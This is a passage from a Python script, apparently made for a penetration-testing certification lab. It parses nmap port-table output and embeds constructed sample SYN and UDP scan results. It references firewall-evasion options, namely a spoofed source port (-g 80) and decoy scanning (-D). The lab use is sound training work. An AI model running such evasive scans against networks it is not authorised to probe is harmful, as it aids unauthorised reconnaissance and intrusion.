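    r"(?P<state>open\|filtered|closed\|filtered|unfiltered|open|closed|filtered)"
    r"\s*(?P<service>\S*)"
)

# Constructed sample of what "nmap -sS -g 80 -p 80,88,135,139,389,445" writes.
SYN_SCAN = """\
Starting Nmap 5.51 ( http://nmap.org ) at 2011-10-11 14:02 EDT
Nmap scan report for 192.168.1.10
Host is up (0.0012s latency).
PORT    STATE  SERVICE
80/tcp  open   http
88/tcp  closed kerberos-sec
135/tcp open   msrpc
139/tcp open   netbios-ssn
389/tcp closed ldap
445/tcp open   microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds
"""

# Constructed sample of what "nmap -sU -v" writes; note the ambiguous rows.
UDP_SCAN = """\
Nmap scan report for 192.168.1.10
Host is up (0.0010s latency).
Not shown: 996 closed ports
PORT    STATE         SERVICE
53/udp  open          domain
123/udp open|filtered ntp
137/udp open|filtered netbios-ns
161/udp closed        snmp
"""


def parse_port_table(text):
    """Return one dict per port row, in file order. Banner, header and
    'Not shown' lines do not match the pattern and are skipped."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            row = m.groupdict()
            row["port"] = int(row["port"])
            rows.append(row)
    return rows


def ports_in_state(rows, state):
    """Port numbers whose state is exactly `state` (e.g. 'open')."""
    return [r["port"] for r in rows if r["state"] == state]


def summarize(rows):
    """Count of rows per state, e.g. {'open': 4, 'closed': 2}."""
    return dict(Counter(r["state"] for r in rows))


def needs_followup(rows):
    """UDP ports reported open|filtered: nmap got no reply, so a firewall
    dropping ICMP port-unreachable and a silent open service look the same.
    These are the ports to re-check with version detection (-sU -sV)."""
    return [r["port"] for r in rows
            if r["proto"] == "udp" and r["state"] == "open|filtered"]


def record(rows):
    """Render rows in the 'PORT STATE SERVICE' form the lab asks you to record."""
    return "\n".join(
        f"{r['port']}/{r['proto']} {r['state']} {r['service']}" for r in rows
    )


if __name__ == "__main__":
    for name, text in (("syn_scan", SYN_SCAN), ("udpscan", UDP_SCAN)):
        rows = parse_port_table(text)
        print(name, summarize(rows))
        print(record(rows))
        if needs_followup(rows):
            print("re-check open|filtered:", needs_followup(rows))
```

For a real run, replace the embedded strings with open("/root/ceh/udpscan").read(); the same parser works on the decoy-scan output too, since the port table format does not change with -D.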